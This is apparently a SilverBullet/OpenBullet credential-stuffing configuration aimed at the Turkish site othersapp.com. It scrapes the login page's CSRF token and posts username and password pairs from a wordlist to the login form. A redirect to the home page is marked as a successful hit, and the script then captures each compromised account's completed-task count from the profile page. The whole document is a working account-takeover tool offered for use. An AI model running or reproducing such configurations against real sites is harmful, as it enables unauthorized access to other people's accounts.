[SETTINGS]
{
  "Name": "WEB - Othersapp",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-07-17T13:03:40.3132768+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 ! Muhammed 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "WEB - Othersapp",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#TokenUrl REQUEST GET "https://www.othersapp.com/giris-yap" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#TokenUrl PARSE "<SOURCE>" LR "type=\"hidden\" name=\"_token\" value=\"" "\"" -> VAR "Token" 

#LoginGonder REQUEST POST "https://www.othersapp.com/giris-yap" EncodeContent=TRUE 
  CONTENT "_token=<Token>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://www.othersapp.com" 
  HEADER "referer: https://www.othersapp.com/giris-yap" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 

#AnahtarKontrol KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<ADDRESS>" EqualTo "https://www.othersapp.com/giris-yap" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" EqualTo "https://www.othersapp.com/anasayfa" 

#CaptureUrl REQUEST GET "https://www.othersapp.com/profil" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CaptureCek PARSE "<SOURCE>" LR "Tamamladığım Görevler (" ")" CreateEmpty=FALSE -> CAP "Tamamlanan Görevler" 

